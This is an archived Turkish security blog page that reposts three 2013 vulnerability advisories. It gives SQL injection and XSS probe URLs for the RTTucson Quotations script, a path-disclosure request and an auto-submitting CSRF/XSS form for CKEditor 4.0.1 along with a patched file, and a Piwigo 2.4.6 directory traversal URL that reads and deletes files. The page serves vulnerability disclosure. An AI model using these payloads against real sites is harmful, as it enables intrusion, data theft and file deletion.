Archive for 20 Şubat 2013

RTTucson Quotations Database – Multiple Vulnerabilities

RTTucson Quotations Database – Multiple Açıklar bulunmuş olup, Açık bulucunun değerlendirmeleri aşağıdaki şekilde;

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ _________ _
 __  / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
____/__,_/_/ /_/_/____/____/__,_/_/  /_/___/____(_)____/_/   __, /  
                                                                /____/   
##################################################################################																
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[ ] (author.php, ID Param)
> > >  http://server/quotations/author.php?ID=5' (MySQLi Found)

[ ] (category_quotes.php, ID Param)
> > >  http://server/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site

> >  (quote_search.php, keywords Param)
> > >  http://server/quotations/quote_search.php?keywords= <h1> Xssed-3spi0n </h1> 

CKEditor 4.0.1 – Multiple Vulnerabilities

CKEditor 4.0.1 – Versiyonunda Genel Açıklar Bulunmuş Olup Açık hakkındaki değerlendirmeler şu şekilde.


=========================================== Vulnerable Software: ckeditor 4.0.1 standard Download: <a href="http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip">http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip</a> Vulns: Full Path Disclosure && XSS =========================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =========================================== Vulnerable Code: /ckeditor/samples/assets/posteddata.php =============SNIP BEGINS====================

<a href="mailto:root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets">root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets</a># cat posteddata.php <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>         <meta charset="utf-8">         <title>Download</title>         <link rel="stylesheet" href="sample.css"> </head> <body>         <h1>                 CKEditor &mdash; Posted Data         </h1>         <table border="1" cellspacing="0" id="outputSample">                 <colgroup><col width="120"></colgroup>                 <thead>                         <tr>                                 <th>Field&nbsp;Name</th>                                 <th>Value</th>                         </tr>                 </thead> <?php

if ( isset( $_POST ) )         $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST else         $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {         if ( get_magic_quotes_gpc() )                 $postedValue = htmlspecialchars( stripslashes( $value ) ) ;         else                 $postedValue = htmlspecialchars( $value ) ;

?>                 <tr>                         <th style="vertical-align: top"><?php echo $sForm?></th>                         <td><pre><?php echo $postedValue?></pre></td>                 </tr>         <?php } ?>         </table>         <div id="footer">                 <hr>                 <p>                         CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>                 </p>                 <p id="copy">                         Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.                 </p>         </div> </body> </html>

=============SNIP ENDS HERE====================

&nbsp;

FULL Path Disclosure example:

URL: <a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a> METHOD: $_POST

HEADERS:

Host: hacker1.own User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30

&nbsp;

$_POST DATA TO SEND:

bangbangbang[]=PATH DISCLOSURE

&nbsp;

Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: <a href="http://i076.radikal.ru/1302/84/edbe3f8f4524.png">http://i076.radikal.ru/1302/84/edbe3f8f4524.png</a>

=================================================

CSRF+XSS <body onload="javascript:document.forms[0].submit()"> <form name="form1" method="post" action="<a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a>" enctype="multipart/form-data"> <input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li> </form>

=================================================

Print Screen:  <a href="http://i062.radikal.ru/1302/e6/25ef023dd589.png">http://i062.radikal.ru/1302/e6/25ef023dd589.png</a>

&nbsp;

================================================= And here is fixed version:  /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS======================= <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>   <meta charset="utf-8">   <title>Sample &mdash; CKEditor</title>   <link rel="stylesheet" href="sample.css"> </head> <body>   <h1>     CKEditor &mdash; Posted Data   </h1>   <table border="1" cellspacing="0" id="outputSample">     <colgroup><col width="120"></colgroup>     <thead>       <tr>         <th>Field&nbsp;Name</th>         <th>Value</th>       </tr>     </thead> <?php

if ( isset( $_POST ) )   $postArray = &$_POST ;      // 4.1.0 or later, use $_POST else   $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {   if ( get_magic_quotes_gpc() )     $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;   else   $postedValue =htmlspecialchars((string) $value ) ;

?>     <tr>       <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>       <td><pre><?php echo $postedValue?></pre></td>     </tr>   <?php } ?>   </table>   <div id="footer">     <hr>     <p>       CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>     </p>     <p id="copy">       Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.     </p>   </div> </body> </html>

=============ENJOYYY====================

KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE ===========================================

/AkaStep

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Açığı Bulunmuş Olup açık hakkında açık bulucunun değerlendirmeleri şu şekilde;

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability


Vendor: Piwigo project
Product web page: http://www.piwigo.org
Affected version: 2.4.6

Summary: Piwigo is a photo gallery software for the web that comes
with powerful features to publish and manage your collection of
pictures.

Desc: Input passed to the &#39;dl&#39; parameter in &#39;install.php&#39; script
is not properly sanitised before being used to get the contents of
a resource or delete files. This can be exploited to read and delete
arbitrary data from local resources with the permissions of the web
server via directory traversal attack.

====================================================================
/install.php:
-------------

113: if (!empty($_GET[&#39;dl&#39;]) && file_exists(PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;]))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;];
116:   header(&#39;Cache-Control: no-cache, must-revalidate&#39;);
117:   header(&#39;Pragma: no-cache&#39;);
118:   header(&#39;Content-Disposition: attachment; filename="database.inc.php"&#39;);
119:   header(&#39;Content-Transfer-Encoding: binary&#39;);
120:   header(&#39;Content-Length: &#39;.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
124: }

====================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko &#39;LiquidWorm&#39; Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php

Vendor Patch: http://piwigo.org/bugs/view.php?id=2843



15.02.2013


--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt